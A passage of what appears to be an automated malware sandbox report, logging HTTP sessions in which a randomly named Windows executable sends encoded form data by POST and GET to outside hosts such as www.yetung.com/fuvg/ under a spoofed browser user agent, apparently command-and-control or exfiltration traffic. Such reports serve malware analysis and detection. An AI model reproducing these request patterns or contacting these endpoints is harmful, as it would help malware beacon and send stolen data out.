                  Data Ascii: ylT8el=mEYQ+LBkCt6nCHz8gc8Ai2zjeU6MSmapgX38VG8mqyn6aDOY/8B5O375Z5IEmdsFzIP7DdGrHxET/SeqiDhqI1b48B39IR77MhlyFQT4mBKuG4yhwo9TBlBmj8zYAtVzWE5wBDxwiNPW07t0Fm1WBMOtzU2m2mpHeofmlMsgPLIFMNYn7ipoiYsK00OJRHQdHwoLGpWdrhMWBkYt240ecY2EzmwQkJHY3phCMIQjSfpCYSWR/SgcH/JDNX4P/uY9eoB122nLAZCyFBHeOwADWhdZNWZZv/5Kjisx3uRYDyoCFd51BsbSAwW18cDKuysHxpNPd39OgGLc17C+SyJioRruCeWkvvFxh09ntjqMX8F1Ka045p2HMqByJjJtPjSE5VsPs0sLu+30EkSYqFwUOXQ6uLEJWM2n46li6BgBiJY+Y3wtD2b9e6/EQ6z/nTilsb+fifHGk8HGkntLyT/z2CvNgu794eyWD5sUIkQv32o118IfNnuxyPdlmCwv/qlsRIlgBV2bD5BSkV4SYZgomhkEqBWWwOq0QzLc4lKHvtnxAo9pllRh+fsxgJJMBnWZ3IqWm7G7xz/ii+SRhjP/ETzWxvd8ciLQI5VvjlXYO6ofAIsA7TmKLtrWdWbxXWw6kpCGhnL4piHdvQYQBm3mblYoHBRn2z0FZuPtDonLlT4tWgFHAQ45pMsfAoY/5Td1BfyOYvr4CDjR1OjWSJdEvBlxyoy0AR2eEYpqQ/r16L62vDFyG/366nfllShf8A78A+e+jkWXibKBqNpCAEGmwA4H3ab3aACxqvGemyn+xe7giuGPdxFfDvIC/vtdstuekEC8991LD2Dpw9R1mzZFSZclxcdIooGgVERpd17pzg92t61N8Aa+xgFMEWVTiqWraumrYoyEZ8HiWLMBJwpSg7iEkkjG4AjbooJK0SSlSGft/spMw6Ke2T5Sth077vbSD6Afh/QuJDL38UpAf2eewaPZ5AYrVDFH0fVPpjNBsUAlZ [TRUNCATED]
                  Jul 3, 2024 10:53:08.500189066 CEST309INHTTP/1.1 405 Not Allowed
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:53:08 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 149
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 78 32 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>tx20</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.1149743165.154.0.120801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:10.147753954 CEST409OUTGET /i74x/?ylT8el=rGww97JzOeWTLmyois9H82aBQ3facQDCwEviMnQ79nb2eFak94tqYxOEecYPqZ845ayBGu2PRCoY8TnogyJmQQHYtnGZFnvjZEpOTC2C7mypHaGwxY9ZF1g=&Qb94=7vWTifjxU HTTP/1.1
                  Host: www.778981.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:11.018973112 CEST1236INHTTP/1.1 200 OK
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:53:10 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 3915
                  Connection: close
                  Last-Modified: Thu, 13 Jun 2024 18:55:23 GMT
                  Vary: Accept-Encoding
                  ETag: "666b409b-f4b"
                  Accept-Ranges: bytes
                  Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e8 af 9a e4 bf a1 e5 ae 89 e5 85 a8 ef bc 8c e8 b6 85 e5 87 a1 e4 bd 93 e9 aa 8c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 37 66 65 32 33 65 65 61 65 65 31 39 31 31 35 32 32 35 64 39 2e 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 61 70 70 2d 72 6f 6f 74 3e 3c 2f 61 70 70 2d 72 6f 6f 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title></title> <base href="/" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="styles.7fe23eeaee19115225d9.css"></head> <body> <app-root></app-root> <script src="https://v-cn.vaptcha.com/v3.js" async defer></script> ... Start of LiveChat (www.livechat.com) code --> <script> if (document.domain.includes('hs246.com') || document.domain.includes('xjc893.com')) { window.__lc = window.__lc || {} window.__lc.license = 14282961 ;(function (n, t, c) { function i(n) { return e._h ? e._h.apply(null, n) : e._q.push(n) } var e = { _q: [], _h: null, _v: '2.0', on: function () { i(['on', c.call(arguments)]) }, once: function () {
                  Jul 3, 2024 10:53:11.019012928 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 28 5b 27 6f 6e 63 65 27 2c 20 63 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 66 66 3a 20 66 75 6e 63
                  Data Ascii: i(['once', c.call(arguments)]) }, off: function () { i(['off', c.call(arguments)]) }, get: function () { if (!e._h) throw new Error("[LiveChatWidget] Yo
                  Jul 3, 2024 10:53:11.019160986 CEST1236INData Raw: 20 20 20 77 69 6e 64 6f 77 2e 5f 5f 6c 63 2e 6c 69 63 65 6e 73 65 20 3d 20 31 34 32 38 32 39 36 31 0a 20 20 20 20 20 20 3b 28 66 75 6e 63 74 69 6f 6e 20 28 6e 2c 20 74 2c 20 63 29 20 7b 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 69 28
                  Data Ascii: window.__lc.license = 14282961 ;(function (n, t, c) { function i(n) { return e._h ? e._h.apply(null, n) : e._q.push(n) } var e = { _q: [], _h: null, _v: '2.0',
                  Jul 3, 2024 10:53:11.019174099 CEST472INData Raw: 20 70 6f 77 65 72 65 64 20 62 79 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 3f 77 65 6c 63 6f 6d 65 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c
                  Data Ascii: powered by <a href="https://www.livechat.com/?welcome" rel="noopener nofollow" target="_blank">LiveChat</a> </noscript> ... End of LiveChat code --> <script src="runtime.36869f6f9588d9b243e1.js"></script><script src="polyfill


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.1149744121.37.199.72801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:16.910839081 CEST666OUTPOST /fuvg/ HTTP/1.1
                  Host: www.yetung.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.yetung.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.yetung.com/fuvg/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 39 68 6a 57 63 68 45 56 78 4e 65 45 61 73 30 53 36 61 41 57 48 49 72 58 41 52 43 55 53 58 72 52 44 56 62 70 44 69 38 49 4d 47 78 74 50 73 6c 6a 75 73 6a 73 63 5a 63 2f 52 6b 63 32 6d 2b 30 51 56 41 74 69 69 48 4a 4b 4c 74 7a 62 52 74 38 65 71 37 79 6f 72 61 4a 66 46 4d 77 47 74 72 49 63 77 67 4b 63 6a 48 6e 77 6d 31 66 77 70 6c 78 41 5a 69 38 43 50 52 69 35 66 77 72 44 31 50 6e 68 70 74 56 45 35 2f 63 36 48 63 4e 2f 55 54 52 61 73 66 56 79 77 46 41 48 74 49 46 77 4e 4c 39 79 67 50 68 32 6e 56 67 74 7a 72 45 56 77 68 55 79 6b 6f 6c 48 52 63 55 71 34 78 37 5a 53 66 55 77 6f 41 3d 3d
                  Data Ascii: ylT8el=9hjWchEVxNeEas0S6aAWHIrXARCUSXrRDVbpDi8IMGxtPsljusjscZc/Rkc2m+0QVAtiiHJKLtzbRt8eq7yoraJfFMwGtrIcwgKcjHnwm1fwplxAZi8CPRi5fwrD1PnhptVE5/c6HcN/UTRasfVywFAHtIFwNL9ygPh2nVgtzrEVwhUykolHRcUq4x7ZSfUwoA==
                  Jul 3, 2024 10:53:17.866528988 CEST1236INHTTP/1.1 200 OK
                  Server: F-WEB
                  Date: Wed, 03 Jul 2024 08:53:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 1127
                  Connection: close
                  Content-Encoding: gzip
                  FAI-W-FLOW: 1439477166
                  Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96e
                  FAI-W-AGENT_AID: 23934566
                  Update-Time: 1718640911
                  Src-Update: true
                  P3P: CP=CAO PSA OUR
                  Origin-Agent-Cluster: ?0
                  X-Content-Type-Options: nosniff
                  X-Permitted-Cross-Domain-Policies: none
                  X-XSS-Protection: 1; mode=block
                  X-Download-Options: noopen
                  Vary: Accept-Encoding
                  Set-Cookie: _cliid=rI3wa6P8mig-JsqP; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:17 GMT; HttpOnly
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a [TRUNCATED]
                  Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$tRqLuo*Lq--k2]-%zw6 A
                  Jul 3, 2024 10:53:17.866545916 CEST531INData Raw: 4f 95 81 85 b5 f5 f5 b5 ce a2 c8 27 d2 40 89 8c c9 43 5d cf a4 93 4f fb a5 aa 35 90 ec 17 85 1a ae 56 89 ca 8a 86 a1 56 17 bf 5d 92 c4 01 1a d8 24 92 7b a9 e1 05 14 09 74 12 d0 98 41 e4 51 98 70 90 01 f2 b6 56 b8 eb da c2 04 f7 0e 66 9c 38 28 30
                  Data Ascii: O'@C]O5VV]${tAQpVf8(0Q@r(eK*GASgQ5azo,>bs/6~4oKIjPM;IIo<IC<p0u]gS114<.wYuF:;Ce2==_Kk.1^B/le


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.1149745121.37.199.72801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:19.442528009 CEST686OUTPOST /fuvg/ HTTP/1.1
                  Host: www.yetung.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.yetung.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.yetung.com/fuvg/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 39 68 6a 57 63 68 45 56 78 4e 65 45 49 59 49 53 71 4c 41 57 51 59 72 55 50 78 43 55 45 6e 72 56 44 56 58 70 44 67 52 54 5a 6c 56 74 50 4f 39 6a 74 74 6a 73 64 5a 63 2f 4a 55 63 7a 6f 65 30 4c 56 41 68 63 69 43 4a 4b 4c 70 54 62 52 74 4d 65 72 49 61 70 35 36 4a 64 4e 73 77 49 6a 4c 49 63 77 67 4b 63 6a 48 7a 4b 6d 31 33 77 6f 56 68 41 59 41 55 4e 54 68 69 34 59 77 72 44 2f 76 6e 74 70 74 56 6d 35 36 45 55 48 66 6c 2f 55 53 68 61 73 75 56 31 36 46 41 4e 79 59 45 77 63 61 4a 36 6c 66 67 59 69 6b 46 5a 30 49 6f 30 31 6e 46 6f 30 4c 73 51 53 50 63 6f 73 58 61 70 62 75 78 35 7a 43 64 64 6a 6b 31 57 53 78 42 49 4a 6d 56 46 79 41 59 64 42 2f 6b 3d
                  Data Ascii: ylT8el=9hjWchEVxNeEIYISqLAWQYrUPxCUEnrVDVXpDgRTZlVtPO9jttjsdZc/JUczoe0LVAhciCJKLpTbRtMerIap56JdNswIjLIcwgKcjHzKm13woVhAYAUNThi4YwrD/vntptVm56EUHfl/UShasuV16FANyYEwcaJ6lfgYikFZ0Io01nFo0LsQSPcosXapbux5zCddjk1WSxBIJmVFyAYdB/k=
                  Jul 3, 2024 10:53:20.555830002 CEST1236INHTTP/1.1 200 OK
                  Server: F-WEB
                  Date: Wed, 03 Jul 2024 08:53:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 1127
                  Connection: close
                  Content-Encoding: gzip
                  FAI-W-FLOW: 1439662166
                  Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96e
                  FAI-W-AGENT_AID: 23934566
                  Update-Time: 1718640911
                  Src-Update: true
                  P3P: CP=CAO PSA OUR
                  Origin-Agent-Cluster: ?0
                  X-Content-Type-Options: nosniff
                  X-Permitted-Cross-Domain-Policies: none
                  X-XSS-Protection: 1; mode=block
                  X-Download-Options: noopen
                  Vary: Accept-Encoding
                  Set-Cookie: _cliid=2-p6tn4e7V9He5fR; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:20 GMT; HttpOnly
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a [TRUNCATED]
                  Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$tRqLuo*Lq--k2]-%zw6 A
                  Jul 3, 2024 10:53:20.555869102 CEST531INData Raw: 4f 95 81 85 b5 f5 f5 b5 ce a2 c8 27 d2 40 89 8c c9 43 5d cf a4 93 4f fb a5 aa 35 90 ec 17 85 1a ae 56 89 ca 8a 86 a1 56 17 bf 5d 92 c4 01 1a d8 24 92 7b a9 e1 05 14 09 74 12 d0 98 41 e4 51 98 70 90 01 f2 b6 56 b8 eb da c2 04 f7 0e 66 9c 38 28 30
                  Data Ascii: O'@C]O5VV]${tAQpVf8(0Q@r(eK*GASgQ5azo,>bs/6~4oKIjPM;IIo<IC<p0u]gS114<.wYuF:;Ce2==_Kk.1^B/le


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.1149746121.37.199.72801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:21.974477053 CEST1699OUTPOST /fuvg/ HTTP/1.1
                  Host: www.yetung.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.yetung.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.yetung.com/fuvg/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Raw: 79 6c 54 38 65 6c 3d 39 68 6a 57 63 68 45 56 78 4e 65 45 49 59 49 53 71 4c 41 57 51 59 72 55 50 78 43 55 45 6e 72 56 44 56 58 70 44 67 52 54 5a 6c 64 74 50 2f 64 6a 76 4f 62 73 50 4a 63 2f 45 30 63 79 6f 65 31 62 56 44 52 59 69 43 4d 33 4c 72 72 62 52 50 45 65 6a 5a 61 70 67 4b 4a 64 42 4d 77 4a 74 72 49 46 77 6b 75 59 6a 48 6a 4b 6d 31 33 77 6f 54 46 41 59 53 38 4e 52 68 69 35 66 77 72 50 31 50 6d 36 70 75 6c 4d 35 36 49 71 45 76 46 2f 55 79 78 61 2f 38 74 31 79 46 41 44 7a 59 45 65 63 61 55 6b 6c 66 38 2b 69 6b 77 2b 30 4c 49 30 33 58 41 66 68 76 6b 2f 50 73 38 63 35 41 36 65 57 64 4a 67 32 79 52 7a 6d 56 31 77 4e 32 64 5a 43 55 41 4a 6c 79 67 4c 55 4a 47 7a 59 72 6c 67 39 35 57 65 65 6e 39 69 77 37 41 48 69 72 37 72 50 48 49 67 71 74 51 51 6d 37 4f 74 78 6f 57 63 4f 51 64 65 6a 2f 48 65 4a 52 48 58 4d 75 47 4f 43 30 7a 54 48 63 75 47 7a 32 32 51 50 2f 30 72 4f 63 35 6c 54 47 75 47 74 46 66 4d 59 77 6c 54 79 72 7a 6a 79 67 41 59 74 41 38 51 4e 37 2b 36 37 4e 71 47 77 69 54 30 51 59 74 35 32 6e 62 [TRUNCATED]
                  Data Ascii: ylT8el=9hjWchEVxNeEIYISqLAWQYrUPxCUEnrVDVXpDgRTZldtP/djvObsPJc/E0cyoe1bVDRYiCM3LrrbRPEejZapgKJdBMwJtrIFwkuYjHjKm13woTFAYS8NRhi5fwrP1Pm6pulM56IqEvF/Uyxa/8t1yFADzYEecaUklf8+ikw+0LI03XAfhvk/Ps8c5A6eWdJg2yRzmV1wN2dZCUAJlygLUJGzYrlg95Ween9iw7AHir7rPHIgqtQQm7OtxoWcOQdej/HeJRHXMuGOC0zTHcuGz22QP/0rOc5lTGuGtFfMYwlTyrzjygAYtA8QN7+67NqGwiT0QYt52nbhtLE8XB8seKA0bmjnek5qiCiFOpR4rSoJ0QS6QaBa6439/S3WPMQ/tIx9Od+/UIosz5MEuA+mqeB3ZHHU0m4izfHz9ag/MOC5TG7LafmdYrziC9tS7M5Dj3JuGUOlmn2Vo8j5nGMXZsCR0bG0DfEWHyREY0AhJ7fQ43K9rdQCg9tUK2zKhUGhNTdQ/UmplaqqaoItQ5HOnATL/wCqkGSzU1QwFZxPpKTp+w3AoL6vrn9hSHLxUB7plxpH1CZunNKifxMjMGzXlhXNyp88kfPaaHdzIfei3VJXII/qi3goErSc5s9jFopXgO9gHNoTrCoAx1T0WR5maVYccEWbUH+4Y89qm+t52YrKshF+CLq9NcFVmQOmEYQgMVz2NiwbvgYloVOOI3EjTYs1QDJJMDBDKswdeQHCrrZb5vlLQ6mddgY1L1+Gp73GoReQ62pUwrfA8NgGHBbqg5cDkOHOjQSoKll7PKzjGhBz9TyEaWwvnTJNilGNKHY7i4jr7NSpcCmjzZLiw/K0nskpTvghCB1y+dmOAH5i2H6pHqa8Qk2yAi+bv9d3hrJ6E+wc+1W2DaJYfblFHKy5H1aFbVF23nCot79P+RNFJHFU8lEKVOAngoMtME3xnjglrHqfp8XnU36xvN4+i4oSmgj3fGgPjRfzUPqUQDJhHG7I7 [TRUNCATED]
                  Jul 3, 2024 10:53:22.958832026 CEST1236INHTTP/1.1 200 OK
                  Server: F-WEB
                  Date: Wed, 03 Jul 2024 08:53:22 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 1127
                  Connection: close
                  Content-Encoding: gzip
                  FAI-W-FLOW: 1439867166
                  Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96e
                  FAI-W-AGENT_AID: 23934566
                  Update-Time: 1718640911
                  Src-Update: true
                  P3P: CP=CAO PSA OUR
                  Origin-Agent-Cluster: ?0
                  X-Content-Type-Options: nosniff
                  X-Permitted-Cross-Domain-Policies: none
                  X-XSS-Protection: 1; mode=block
                  X-Download-Options: noopen
                  Vary: Accept-Encoding
                  Set-Cookie: _cliid=QWDiENi4xHZuMd2b; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:22 GMT; HttpOnly
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a [TRUNCATED]
                  Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$tRqLuo*Lq--k2]-%zw6 A
                  Jul 3, 2024 10:53:22.958956957 CEST531INData Raw: 4f 95 81 85 b5 f5 f5 b5 ce a2 c8 27 d2 40 89 8c c9 43 5d cf a4 93 4f fb a5 aa 35 90 ec 17 85 1a ae 56 89 ca 8a 86 a1 56 17 bf 5d 92 c4 01 1a d8 24 92 7b a9 e1 05 14 09 74 12 d0 98 41 e4 51 98 70 90 01 f2 b6 56 b8 eb da c2 04 f7 0e 66 9c 38 28 30
                  Data Ascii: O'@C]O5VV]${tAQpVf8(0Q@r(eK*GASgQ5azo,>bs/6~4oKIjPM;IIo<IC<p0u]gS114<.wYuF:;Ce2==_Kk.1^B/le


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.1149747121.37.199.72801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  TimestampBytes transferredDirectionData
                  Jul 3, 2024 10:53:24.514997005 CEST409OUTGET /fuvg/?Qb94=7vWTifjxU&ylT8el=wjL2fUVi/vacV80Y2aNNPqSsAyaVO2G0XUXvAjUGJRlNA9hvm73ZM/ZGCRwMrdgYWSVcgksWY7rEUvpJmp/24/R5TooPs7UexVe6llrM7njVoxJ4Iww3fUU= HTTP/1.1
                  Host: www.yetung.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:25.491576910 CEST1236INHTTP/1.1 200 OK
                  Server: F-WEB
                  Date: Wed, 03 Jul 2024 08:53:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 3112
                  Connection: close
